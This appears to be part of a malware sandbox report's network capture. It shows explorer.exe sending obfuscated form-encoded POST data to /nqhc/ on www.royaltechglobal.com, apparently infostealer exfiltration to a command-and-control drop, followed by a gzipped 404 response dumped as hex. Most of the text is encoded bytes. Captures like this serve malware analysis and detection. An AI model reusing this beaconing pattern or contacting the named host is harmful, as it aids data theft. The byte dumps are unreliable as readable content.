                                                                                                                                                                          Data Ascii: vwTI$ugY6!^<x2x!]\pcTq@k|*39W{1Y?,f\^q}n<k#%9/rb#\JrWl,*\?.JHS^-rWXzD,7LsYG:Uti/$I]"q?j#g


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          66192.168.11.2049911192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:45.939966917 CET12368OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.royaltechglobal.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 6d 34 68 69 42 64 39 5a 52 54 61 35 68 79 4a 2d 33 71 7e 65 45 5a 58 6f 4f 54 4a 44 51 63 62 5f 49 35 74 32 7a 6d 28 51 49 4c 79 61 61 41 48 57 6f 68 6f 73 67 45 49 70 39 4f 72 4a 39 38 48 44 31 47 6c 67 32 71 70 65 45 65 48 6c 79 59 36 42 6e 33 6d 32 4f 30 44 50 51 6e 6b 36 4d 6c 67 53 41 45 76 76 62 37 61 64 62 54 30 7a 6d 35 52 69 65 72 4e 64 4e 6b 70 34 44 52 61 74 45 79 4f 51 71 38 4a 4f 6d 57 43 74 7e 58 52 59 65 4d 33 34 32 49 75 50 45 36 44 47 58 45 44 61 4d 4d 63 2d 36 70 74 4a 7e 63 6f 74 51 73 78 2d 75 4b 76 64 65 63 65 4f 6d 43 32 61 58 69 79 76 48 54 7e 4e 64 33 53 7a 46 31 39 76 37 79 64 64 28 50 6d 49 5a 6e 78 6e 63 67 52 62 78 51 34 57 73 4c 4a 6c 61 7a 30 74 69 50 75 53 50 2d 43 51 7e 63 28 31 76 48 77 6b 6b 32 52 77 66 6e 67 54 54 65 37 45 66 71 57 6a 63 46 73 6a 69 41 51 6b 34 48 76 4e 28 53 37 44 66 32 36 4a 44 47 6a 4e 6f 79 4a 62 5a 6c 37 38 67 7a 4c 63 4c 42 71 62 51 7a 44 66 43 64 7e 7a 32 50 57 62 48 33 72 5f 79 2d 4a 54 46 4b 4e 75 38 50 49 6e 38 49 72 30 4a 62 77 5a 32 51 4f 6e 42 4a 49 68 7a 77 66 69 37 55 7e 64 75 50 4f 43 7a 4f 39 43 45 49 46 30 34 62 63 49 50 65 51 57 77 4b 54 62 4e 66 5a 45 38 4a 72 78 6a 72 4c 48 66 35 42 4f 4b 55 72 7a 45 30 6a 36 6b 4c 7a 64 54 6a 51 53 72 72 7a 51 4d 49 62 6b 49 77 61 58 76 77 68 33 57 36 33 4d 76 56 70 5a 51 6f 50 56 46 57 6a 54 42 38 48 5f 4a 4a 48 58 6d 70 65 47 6a 57 35 6d 31 4e 41 75 69 42 4d 4e 6b 62 44 33 71 69 44 34 55 79 42 72 62 56 38 65 36 6b 55 61 49 30 37 47 68 61 46 58 4b 6f 49 48 57 72 58 44 37 62 54 6e 65 57 54 34 42 76 66 57 46 76 79 42 75 73 50 4d 64 74 57 53 44 42 38 6c 48 32 56 46 6c 74 7e 67 42 75 59 70 6e 53 7a 46 72 68 47 38 76 43 54 72 36 50 66 33 76 36 4a 30 76 39 69 41 32 37 39 6f 33 56 57 54 4e 4f 64 72 6a 43 34 72 64 6d 55 47 30 38 4d 59 4b 76 73 75 51 48 6e 30 74 39 35 2d 45 38 57 51 45 5a 5a 39 6b 48 45 6f 41 6e 56 68 54 73 56 6e 69 52 37 37 72 45 58 42 45 56 4a 52 65 76 52 63 4c 33 58 61 58 31 39 4a 39 4e 36 53 4e 4f 74 6a 38 68 71 2d 4f 38 5a 64 6d 48 38 4c 79 59 4b 73 77 76 4a 50 61 72 46 73 45 50 6f 64 37 44 71 6c 58 73 36 6e 4d 38 39 77 45 4a 62 6a 36 36 77 42 61 33 49 4c 37 73 35 34 4b 66 71 36 4b 69 31 32 73 37 63 31 74 55 73 51 51 4c 48 4c 4e 71 36 67 7a 61 43 4c 66 55 39 6d 4e 45 75 45 52 55 5a 5a 4e 50 30 76 36 73 32 50 43 46 51 55 59 41 63 6c 36 4e 58 65 6a 41 4b 67 34 72 75 42 63 34 50 51 28 37 36 45 59 52 41 39 56 65 36 66 34 58 49 4a 74 56 48 34 7a 6f 55 37 61 49 28 39 76 4d 28 39 34 72 71 2d 49 70 65 72 42 6d 50 7a 31 4d 4b 65 54 67 71 68 62 76 55 64 31 38 4b 46 71 79 4e 52 64 51 46 6a 76 50 4e 7a 47 56 44 32 36 32 45 30 48 7a 32 5a 75 49 30 43 37 64 63 41 4b 49 78 68 30 56 30 53 55 77 6c 58 78 4d 36 42 6c 75 33 48 4a 51 7e 33 71 76 72 46 4a 32 50 73 4f 51 4b 56 4b 45 38 54 69 33 57 62 46 48 74 39 58 52 7a 2d 39 33 79 2d 6c 6e 75 46 30 4e 63 64 54 64 47 6c 4e 78 55 5a 32 49 76 58 74 66 4f 58 28 4d 28 62 70 61 66 76 32 35 39 64 57 79 4e 45 70 62 68 77 63 68 54 5f 28 74 43 72 4a 35 67 44 36 47 42 37 67 4c 44 2d 4f 5f 73 4c 72 37 65 4f 39 43 56 52 5a 37 36 4c 69 67 52 31 46 43 4f 53 59 56 48 71 75 59 54 38 58 5a 32 39 42 72 42 58 47 42 4a 30 34 30 48 47 77 4b 6a 5f 47 52 45 6b 70 63 5a 53 28 56 6f 6e 7a 66 6f 4e 39 55 7e 6a 79 6f 6f 42 62 5f 54 6a 4a 67 63 77 62 77 30 7a 63 68 7a 5a 73 41 73 65 74 2d 71 34 59 79 7e 33 65 41 72 48 6b 56 51 76 6a 65 45 4c 76 4f 71 68 47 4c 6a 4b 50 45 4c 35 73 37 67 30 47 6f 6d 2d 51 4d 66 44 50 38 41 51 6d 67 73 4b 66 51 6f 36 32 65 68 76 7e 75 56 43 7a 77 58 55 62 68 6a 78 69 68 6a 67 6e 6f 5a 58 4f 31 79 31 6a 43 4a 43 4d 46 5a 55 7a 71 52 39 71 6f 4f 42 37 32 53 59 4e 62 6d 69 47 56 38 33 7a 36 43 52 48 6e 62 58 4e 47 51 54 4e 37 4f 48 76 6a 70 58 31 55 61 76 30 31 48 30 55 64 28 4d 77 6e 76 6e 39 47 30 45 57 6d 64 33 47 35 33 59 44 50 41 63 34 51 73 4a 4f 34 30 55 48 45 77 69 53 56 43 44 37 68 61 42 77 76 4e 70 36 45 31 58 49 6e 71 73 72 36 50 6a 61 44 69 61 59 56 6f 4b 75 71 79 77 39 50 7e 63 31 7a 6e 37 4a 69 31 4a 46 75 58
                                                                                                                                                                          Data Ascii: 7nWHV=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hm4hiBd9ZRTa5hyJ-3q~eEZXoOTJDQcb_I5t2zm(QILyaaAHWohosgEIp9OrJ98HD1Glg2qpeEeHlyY6Bn3m2O0DPQnk6MlgSAEvvb7adbT0zm5RierNdNkp4DRatEyOQq8JOmWCt~XRYeM342IuPE6DGXEDaMMc-6ptJ~cotQsx-uKvdeceOmC2aXiyvHT~Nd3SzF19v7ydd(PmIZnxncgRbxQ4WsLJlaz0tiPuSP-CQ~c(1vHwkk2RwfngTTe7EfqWjcFsjiAQk4HvN(S7Df26JDGjNoyJbZl78gzLcLBqbQzDfCd~z2PWbH3r_y-JTFKNu8PIn8Ir0JbwZ2QOnBJIhzwfi7U~duPOCzO9CEIF04bcIPeQWwKTbNfZE8JrxjrLHf5BOKUrzE0j6kLzdTjQSrrzQMIbkIwaXvwh3W63MvVpZQoPVFWjTB8H_JJHXmpeGjW5m1NAuiBMNkbD3qiD4UyBrbV8e6kUaI07GhaFXKoIHWrXD7bTneWT4BvfWFvyBusPMdtWSDB8lH2VFlt~gBuYpnSzFrhG8vCTr6Pf3v6J0v9iA279o3VWTNOdrjC4rdmUG08MYKvsuQHn0t95-E8WQEZZ9kHEoAnVhTsVniR77rEXBEVJRevRcL3XaX19J9N6SNOtj8hq-O8ZdmH8LyYKswvJParFsEPod7DqlXs6nM89wEJbj66wBa3IL7s54Kfq6Ki12s7c1tUsQQLHLNq6gzaCLfU9mNEuERUZZNP0v6s2PCFQUYAcl6NXejAKg4ruBc4PQ(76EYRA9Ve6f4XIJtVH4zoU7aI(9vM(94rq-IperBmPz1MKeTgqhbvUd18KFqyNRdQFjvPNzGVD262E0Hz2ZuI0C7dcAKIxh0V0SUwlXxM6Blu3HJQ~3qvrFJ2PsOQKVKE8Ti3WbFHt9XRz-93y-lnuF0NcdTdGlNxUZ2IvXtfOX(M(bpafv259dWyNEpbhwchT_(tCrJ5gD6GB7gLD-O_sLr7eO9CVRZ76LigR1FCOSYVHquYT8XZ29BrBXGBJ040HGwKj_GREkpcZS(VonzfoN9U~jyooBb_TjJgcwbw0zchzZsAset-q4Yy~3eArHkVQvjeELvOqhGLjKPEL5s7g0Gom-QMfDP8AQmgsKfQo62ehv~uVCzwXUbhjxihjgnoZXO1y1jCJCMFZUzqR9qoOB72SYNbmiGV83z6CRHnbXNGQTN7OHvjpX1Uav01H0Ud(Mwnvn9G0EWmd3G53YDPAc4QsJO40UHEwiSVCD7haBwvNp6E1XInqsr6PjaDiaYVoKuqyw9P~c1zn7Ji1JFuXIxkCnk1E9qSQU5c911oQ_RtGZge4UnWli~FUKNzEj38xueZnPN_iqr3ABEfQVVDSkosJTWILNFxdELG9NuObvpLBRKHsit8H9iI2iRPkNmScMT-O_WiE-RSLn35c0hc2-g5AdLPYszRMIMYOQn6lLysCm~qKKf_iwYCIDBNb9ONSoweWeiMgfExifGxRJNUKvhtU3qad1LgygiIJP~bLe00q6fWcAAxffaByh2NftaIIwO3l78rAznFtAiz24s-GerDpIvDViAMfOlrXw4mBZ8J(36E16~chqXZCLXc9exgYPxAac1qX3eNbPN02L0WGSUxJZSLUNVTVaenttuxzp~Xb9Nph6zy0av9EtwvF8nB8-mstN4WXYzknH21WjIpxrqihLhMcG3-6owcWuGFp7KzIVfheGjFWfaP~KGR4fvJ(xf9UzrJ2W(1PMv5Tle9eOHnh0ff7Ban(p3bAC~oNcU3p_Cv2w9lqElV(_4pfJlSe-qY7HSJbxEL3pFe4j1rVIwZutC6KKMcA5PGsf743_cywZZU2h~rQrqlqOjFDHi2uezk2w0T8ejeHiJyh88keJV0NulXIR7mXv7R68Gl246kaFy3Clf8M3VB5wqWAkWXuuzsQSpwxLOe7AdCJ-0Dx3FdHNsa1zpnBEKUy4SzW19vH7zHB5QUiH~fgzfWflgKjxxLlW6i42VXoF0mp2UHp6wOflIVpX0FYxk1bLXF~NVj(cX_oc32WwUr1VLb6OGOdvD4oxYHTWKYFEZvyC8F9gcVhh0ol_OlGZT1uy62TzUM4rWuA-KNm43qgCXlfN8RaztLThpXWA806o6NdwRTFX6WgzNMAoXACI~emCUDojGSeL3XyK97UD4-RxrsOJQABWuhabl37ZsLvnGin10LlrcvD9GW8IQ4A14Z1PeG76aSy8uDw5XodYaepbhfCMk_~nmDVE~AqqXNgXp60Ukwhxy1bdMnRjvw3uH_Kb(JRadaGh9nCHlA4nTJ5cA-zkTe6HqNSU4kF1f2p_E3vwRdFws37lmxXDmyDH7a(e0F7Vl5t5PS1GrD8m9QUwoun5IE4ID3KprR7TDq(UGIo-0WIqWKXVKwII89Dw924G~qA32QfCzRzra2dUkWYgGErwC_C5j8HNAWQjU-M6ONR_m-2JAiit0NU1zazbvsvczn6Hw7u1(mm_M_tMJvbmcrBA5uVs0Amxip~fSFtZ74PHomX4ueC2un(F1A4PvYQwD8xEBA8Xu_K4OPAOSPbwBi2-qp6mYa(i1QSqbJhxECDtsIJgVSVcm5sYxkXhGy4FrxF2fOzpInUV0zl6B-DF5DMV9lFJnsu0QnkCAc1It2syNGDQUcFm~sJ1UYswHrnHwSEf1lundys3siJI136-YBAx0hneHUGow7kRzXCFEjfsnYyZlwCAh7vb(epivaRIP5Mxf3(rJTtUS9ulw3l0~O6i(bOPGgg4Rwry9ixOLqOIu1pRl6CBUlJIUbgDIn7TI60FFjY9Yh~lOAIy42xSzRGpzExiUhKWmUg-XE6es8kHlYOLHP8cKF6TDXIRwu9xg_aKVoPFOsZdXUabi-HhLQTvcLFTDCDc95vXc9vTGt(zDHblvl0E5Xs2a0INHu94tAe788xTrBW35HsNBaU5AgPc8ybio8K62UYqUzuspuObO4qXGOe9omjektJpyvDEvFDCTnodEQoM(sLT87Z-3C4aMoO6yxauhiZP8fLiengjGcZIcLxGAU5GUaCbf-u0~9tTzrY6pIVygsDSINzH8Y0MxL0R70Ao2Qzdo0eSEDfgA7z0LtHZS5q93N1lA7duty8RuzEmTqCMfcYdiAdzUVfUhgpFWTbLeE(sz_FfQo0qwYpvb3Yi0ruRepdiUnTIWjgD9DxwrtdgoiwSEeCK5EDZME7ST7jJ0lGOD6fr3yUP4YTjblSQ~XuVzyq4m3mOk0Cxy-4YNV52yD7N9tpIWRjxifUYR-LFSv5cy7MnTOWErUkTXHHqR14XJFFxsntdMI2NgHBpr3(cj73-zUMDCd9-I_Tza7cIkXlpdwUQHziDwgbDykjIl6N72KTEp66UfyLO(z7BPhoy(-(
                                                                                                                                                                          Dec 5, 2022 15:18:45.940052986 CET12377OUTData Raw: 31 4f 43 57 47 51 77 47 5a 78 36 50 50 58 61 41 31 28 57 6d 48 6d 5a 50 52 33 53 44 44 67 37 35 78 56 52 6c 62 4a 59 51 4c 4e 45 6e 4b 67 6a 77 48 51 72 6c 5a 46 32 69 41 65 4c 6f 55 51 36 48 77 77 30 56 69 49 31 62 75 4d 54 39 4e 44 43 50 5f 4d
                                                                                                                                                                          Data Ascii: 1OCWGQwGZx6PPXaA1(WmHmZPR3SDDg75xVRlbJYQLNEnKgjwHQrlZF2iAeLoUQ6Hww0ViI1buMT9NDCP_MouFBrts801JRT7nzjY5sPoAJArqBZ(o6nbjKqdto31XSVi7LpQFNW(uzk3UlSHUrDIakW4v84kSSqvzXXBDDdvwDVCAIwB9A5A-C4Oye6sAiHdJVb4TZVVLHP5cYHAOX-HHrb9gj72gHUQbQViOuQKF1dg3T_65x5
                                                                                                                                                                          Dec 5, 2022 15:18:46.054534912 CET12383OUTData Raw: 36 4f 59 4b 57 32 6c 59 2d 76 50 42 2d 38 76 79 71 46 75 28 6c 50 38 28 5a 74 70 45 6e 7a 74 4a 53 35 46 6c 56 7a 73 78 49 71 4f 65 49 32 36 69 34 46 67 38 50 77 7a 77 6c 6f 6f 48 4b 38 46 74 48 30 71 4f 59 76 7a 72 44 77 74 31 6c 77 31 46 67 59
                                                                                                                                                                          Data Ascii: 6OYKW2lY-vPB-8vyqFu(lP8(ZtpEnztJS5FlVzsxIqOeI26i4Fg8PwzwlooHK8FtH0qOYvzrDwt1lw1FgYh~RkFKyWjWVtbar53SLTWgsl5fUmWOS~pVSJC5yXj~z9m(5sHZXhB8M8vnV6JlTvGx343Oll3hidVSUikl9jyrENFo3ZFbJ6vj0Munk23rw6YPzMG40(QuKR7AgJUJYkMEFExMpvpujrI4-gtypeax-Tcx047Sc~Z
                                                                                                                                                                          Dec 5, 2022 15:18:46.054661036 CET12396OUTData Raw: 39 62 4d 32 53 4b 52 6b 44 57 31 78 6c 66 35 28 6a 37 78 48 52 50 6a 45 70 33 4d 4e 41 59 4b 57 42 6d 54 66 76 74 62 76 6f 4e 51 37 56 52 30 6b 4f 52 6c 41 53 62 34 69 6a 4a 30 77 6b 6e 71 6b 37 54 4c 45 72 64 63 74 53 73 31 59 38 36 61 62 35 63
                                                                                                                                                                          Data Ascii: 9bM2SKRkDW1xlf5(j7xHRPjEp3MNAYKWBmTfvtbvoNQ7VR0kORlASb4ijJ0wknqk7TLErdctSs1Y86ab5ces9iKxQ9u0LCsFqe2Ypmfh50ArMlVZfN9NdimGaOslqWgizln93GPrnrvDOAFLqYNlPb0I8sJjY5CO1D4jDWertP7aedRIGyvabVFtwwmU8aAcKYywkQbRG6DVfbbOBIKvPr9F9CvSMi9A7BAVgn55e4gWDPit6sO
                                                                                                                                                                          Dec 5, 2022 15:18:46.054738045 CET12402OUTData Raw: 39 6c 43 61 4d 75 6c 4c 4d 62 70 64 33 4a 54 63 77 48 4f 74 48 39 6f 37 4f 69 6f 50 6c 56 39 48 4c 5a 76 68 6c 4b 63 76 4c 66 31 68 47 39 72 58 63 50 5a 73 57 6b 65 31 50 37 6a 79 74 50 6c 53 51 67 74 69 53 37 52 61 32 45 42 41 78 51 45 4f 5f 4d
                                                                                                                                                                          Data Ascii: 9lCaMulLMbpd3JTcwHOtH9o7OioPlV9HLZvhlKcvLf1hG9rXcPZsWke1P7jytPlSQgtiS7Ra2EBAxQEO_Mql07fwRAFlKDS24Muelh-oZ~mPLwYTOUb6g0GcSC5CvMGxc6TNjbjVceDBP~eAF8ITWhBMKLN3Pfb6MTLGTQq6rGGOiLE6QIAtFdquILolUJfGv(SMlwAPpzCK0eA6CcX(QG4Cr5z1qgRzcHLJzEhQiHsOQ8tSdQQ
                                                                                                                                                                          Dec 5, 2022 15:18:46.169112921 CET12409OUTData Raw: 64 57 6b 4f 34 6a 44 35 49 77 42 33 6c 32 54 71 49 51 46 66 43 56 64 6a 43 66 46 61 31 4e 49 7e 78 59 36 4e 56 42 65 32 38 4c 54 4e 70 44 4b 7a 53 4f 74 52 6b 4c 76 51 44 54 77 62 79 38 52 33 4c 64 6b 6b 62 65 69 50 78 28 68 48 50 76 75 54 59 63
                                                                                                                                                                          Data Ascii: dWkO4jD5IwB3l2TqIQFfCVdjCfFa1NI~xY6NVBe28LTNpDKzSOtRkLvQDTwby8R3LdkkbeiPx(hHPvuTYcqmtcMW58ppTX3mdAavYFi2_~oSqDZ4dM2LuVyorx96pi6jM5HAcJJzmhxTnHO(TPU(bWQMBDxjBG1oy5VLhf3OEOqY_OeWXzyM7QmOdyc30occgxZ01YAvPXkCYFe1hZ29q7KFjcQupsSObyll6fZlJ0C~gMlP23_
                                                                                                                                                                          Dec 5, 2022 15:18:46.169214964 CET12415OUTData Raw: 35 48 54 53 7a 63 74 50 31 75 35 48 56 47 66 45 6f 66 48 65 58 31 56 59 43 6f 33 49 4f 68 63 70 54 57 68 7a 47 39 4a 4d 56 4d 33 67 46 74 58 67 2d 28 6f 79 43 61 63 62 71 68 4e 6e 4a 51 5a 77 54 7e 6c 49 36 4e 6c 44 72 6d 5f 52 35 66 53 4f 45 6e
                                                                                                                                                                          Data Ascii: 5HTSzctP1u5HVGfEofHeX1VYCo3IOhcpTWhzG9JMVM3gFtXg-(oyCacbqhNnJQZwT~lI6NlDrm_R5fSOEn929Np(VX0nbF9iHeVwnKaRJVvt8y9Up3Zgwy0bvQLBPntckO9pzy6ofF7qxMbZ0dvKmBztZtSPKO-Ev1CnAPd~g84pP5aaa6zKkNY6UFNs_iuFoFssBO0vwNgIMkcv1esbJFIuOawfsTF9pP9YWtlfLw9v3ujdvRg
                                                                                                                                                                          Dec 5, 2022 15:18:46.169296026 CET12416OUTData Raw: 39 75 42 6a 43 65 6b 59 51 35 34 79 56 28 35 63 68 55 44 5a 56 6b 4b 46 55 33 75 75 53 6e 56 36 37 76 63 78 38 35 75 49 79 34 49 77 63 63 70 76 30 48 48 7e 38 4f 63 75 4e 52 7a 4c 6b 63 63 61 41 63 79 45 43 77 35 69 6c 43 49 55 67 34 71 74 46 4b
                                                                                                                                                                          Data Ascii: 9uBjCekYQ54yV(5chUDZVkKFU3uuSnV67vcx85uIy4Iwccpv0HH~8OcuNRzLkccaAcyECw5ilCIUg4qtFK5tBpD60FRZl7wfvnuBgYVGVC74ucFjBHdBjfNdWyo82CAaocsYF9oFeEid173J4S29J4kni9GaXzNQ4GlVjeua_mKitBW2INpFGUoUifMDp0mg1A7iCVCKTifuWjoRxDed7coI-qcK7amRxQmi6eaQnNfxt7oDFXp
                                                                                                                                                                          Dec 5, 2022 15:18:46.442459106 CET12418INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:45 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 13070
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                          Data Ascii: rksg1\- "c+;OR&0`bto$bdgM[LOWoW$5/8(p*IL{/C`;30D)U7$hg`KeIa@`&0f?s]sy+\zK:^;E2#;KK}d"kwSj)Ny1hsQy|QKjo%YWG)dNsG8=R<Gh:_06UT66+JN)7!V->y1+l{|s(fVTMglyvSlUUXg>m:ZVjTM~|#o+LLz;uY*^~kzw6dm\E}~l2H|K~j})zE-NXlR4EpR`Ij^a|9o$=@WUUH]")J?Rekf4T@HYuy=z*LV4SPO[<Nb3%/8'Luib"+s2;dLJLjSVHdzA@\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                          Dec 5, 2022 15:18:46.442534924 CET12419INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f 7e d4 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                          Data Ascii: PKTK?e%,{RXE~|~'q)suBFD<uomZe~y:<MC5^dUQ"@f~h8LNx%(0h!95FTvb"t~+@M]&.CoS~ska5IF.vy%W+6lcmre#DV
                                                                                                                                                                          Dec 5, 2022 15:18:46.442594051 CET12421INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba 5f 45 48 6b e9 7e d0 03
                                                                                                                                                                          Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$E_EHk~o/Lo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                          Dec 5, 2022 15:18:46.442651033 CET12422INData Raw: 0b dc 1e 83 94 c7 25 a4 2d cb 2a de 38 08 fa 6e da ab 3d 50 96 3d b2 8a 8c 19 37 2c 90 a5 58 16 b3 65 d5 9c a1 3d 0a a3 e0 b7 82 29 88 5d eb b4 b5 24 e6 76 3a cb 69 1c 33 91 2c 3c 5e 8a dc f4 da 9b d7 25 c5 85 e5 aa 35 43 a2 29 b0 24 35 25 c4 13
                                                                                                                                                                          Data Ascii: %-*8n=P=7,Xe=)]$v:i3,<^%5C)$5%M;bJhEESqFQGReP[4l"j,(#hSrcT,o=%'gt/a@5:[W-A9u(Uf%g,I.UOb5.vQEcV^Fht(YFn7n8=!
                                                                                                                                                                          Dec 5, 2022 15:18:46.442707062 CET12423INData Raw: b5 4f 36 a4 9c 60 4a d7 6b 1e d9 94 db de 24 05 05 fb 1e d3 28 c4 54 16 c6 1d 71 b8 3e b8 49 68 6e 07 ea da 9c 50 c6 53 b2 92 21 27 64 48 3c ca 59 22 38 8c cc 0d 46 28 5a d8 9e cf 32 d4 93 09 97 09 ce 70 ed da 50 85 2f cd 3b 61 10 31 8e f2 28 b8
                                                                                                                                                                          Data Ascii: O6`Jk$(Tq>IhnPS!'dH<Y"8F(Z2pP/;a1(bI:G//-G#M]i-$XKe+IH!$Z+.Xmf!];aI{dLNrrpr28ppgVlbi_&f:{9(>+)@{
                                                                                                                                                                          Dec 5, 2022 15:18:46.442763090 CET12425INData Raw: ca 1f 3e a2 87 17 9c 86 87 6f 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 5f d3 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d 4e
                                                                                                                                                                          Data Ascii: >oEuu1^(e_jKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD>4:L*fe',T?nK*PKYH\2KfqR^@DL,tr|~NC&hs'YP2mT
